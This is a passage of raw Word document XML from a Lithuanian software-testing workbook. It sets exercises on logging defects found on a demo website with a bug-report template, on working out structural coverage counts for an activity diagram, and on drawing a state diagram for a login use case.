    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AA36F7" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> 3</w:t>
      </w:r>
      <w:r w:rsidR="0022222E" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> KLAIDŲ REGISTRAVIMAS</w:t>
      </w:r>
      <w:r w:rsidR="00EB31AB">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C60296" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Apsilankykite svetainėje </w:t>
      </w:r>
      <w:hyperlink r:id="rId37" w:history="1">
        <w:r w:rsidRPr="00AD4464">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://demoqa.com/category/interactions/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AD0FE5" w:rsidRPr="00AD4464">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> a) Panagrinėkite „interractions“ kategorijos turinį ir raskite bent 5 defektus; b) detaliai aprašykite rastus defektus panaudodami žemiau pateiktą šabloną. Nurod</w:t>
      </w:r>
      <w:r w:rsidR="00AD0FE5" w:rsidRPr="00AD4464">
        <w:t>ykite visus atributus</w:t>
      </w:r>
      <w:r w:rsidR="00EB31AB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD0FE5" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">UŽDUOTIES TIKSLAS: </w:t>
      </w:r>
      <w:r w:rsidR="0057044A" w:rsidRPr="00AD4464">
        <w:t>Aptikti žiniatinklio puslapyje defektus ir tinkamai j</w:t>
      </w:r>
      <w:r w:rsidR="0014567F" w:rsidRPr="00AD4464">
        <w:t>uos</w:t>
      </w:r>
      <w:r w:rsidR="0057044A" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> įregistruoti.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A26FC" w:rsidRPr="00AD4464" w:rsidRDefault="003A26FC" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-L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237"/>
      </w:tblGrid>
      <w:tr w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8613" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Defekto ataskaita</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:t>#_</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Testuotojas</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14567F" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Data</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14567F" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>pavadinimas</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8613" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Defekto apibūdinimas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="0014567F" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>URL</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DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Defekto aprašymas</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DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Ekrano nuotrauka</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14567F" w:rsidRPr="00AD4464" w:rsidRDefault="0014567F" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Platform</w:t>
            </w:r>
            <w:r w:rsidR="00DB7913" w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="0014567F" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Naršyklė</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="0014567F" w:rsidRPr="00AD4464" w:rsidRDefault="0014567F" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8613" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
          </w:tcPr>
          <w:p w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Prioritetas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Svarba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2376" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>Priskirta (kam?)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6237" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00DB7913" w:rsidRPr="00AD4464" w:rsidRDefault="00DB7913" w:rsidP="00372B3A">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="0002324C" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Hlk14110302"/>
      <w:bookmarkStart w:id="118" w:name="_Toc14392429"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> Taikyti testavimo atvejų kūrimo technikas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002C28AD" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="00AD0FE5" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TRUKTŪRINIO TESTAVIMO TECHNIKOS</w:t>
      </w:r>
      <w:r w:rsidR="00EB31AB">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00074656" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Pateiktai veiklos diagramai nurodykite minimalų testų skaičių, kuris užtikrintų pilną padengimą taikant: a) sprendimų,</w:t>
      </w:r>
      <w:r w:rsidR="00AD0FE5" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> b) sakinių, c) kelių technikas</w:t>
      </w:r>
      <w:r w:rsidR="00EB31AB">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00AD0FE5" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">UŽDUOTIES TIKSLAS: </w:t>
      </w:r>
      <w:r w:rsidR="006F1BC2" w:rsidRPr="00AD4464">
        <w:t>Išmokti taikyti struktūrinio testavimo technikas minimaliam testavimo atvejų kiekiui nustatyti. Suprasti sprendimų (decision), sakinių (statement), kelių (path) technikas ir skirtumus tarp jų.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00EF059E" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:object w:dxaOrig="8735" w:dyaOrig="8710">
          <v:shape id="_x0000_i1025" type="#_x0000_t75" style="width:396.75pt;height:395.25pt" o:ole="">
            <v:imagedata r:id="rId38" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Visio.Drawing.11" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1636399722" r:id="rId39"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002C28AD" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="003C6832" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SPECIFIKACIJA BESIREMIANČIOS TESTAVIMO TECHNIKOS</w:t>
      </w:r>
      <w:r w:rsidR="00EF059E">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00093FAC" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>UŽDUOTIES TIKSLAS</w:t>
      </w:r>
      <w:r w:rsidR="00916E20" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00D32FD1" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">Išmokti taikyti specifikacija besiremiančias testavimo technikas tinkamam reikalavimo padengimui testais nustatyti, suprasti skirtumus tarp jų. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00093FAC" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>2a u</w:t>
      </w:r>
      <w:r w:rsidR="00916E20" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>žduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00D32FD1" w:rsidRPr="00AD4464">
        <w:t>Žemiau yra pateiktas vartotojo prisijungimo prie sistemos (aut</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:t>entifikacijos) panaudos atvejis</w:t>
      </w:r>
      <w:r w:rsidR="00EF059E">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D32FD1" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nupieškite būsenų diagramą šiam panaudos atvejui;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C34B97" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Nurodykite</w:t>
      </w:r>
      <w:r w:rsidR="00D32FD1" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> minimalų skaičių testų, kurių reikia pilnam padengimui užtikrinti</w:t>
      </w:r>
      <w:r w:rsidR="009847C7" w:rsidRPr="00AD4464">
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C34B97" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t>Nurodykite</w:t>
      </w:r>
      <w:r w:rsidR="00D32FD1" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve"> koks yra maksimalus testų skaičius. Kaip manote, ar jūsų pateiktame sąraše yra besidubliuojančių testų?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Panaudojimo atvejis 1: Autentifikacija sistemoje</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Aktorius: administratorius, vadybininkas, sandėlininkas, pardavėjas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="003E55FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
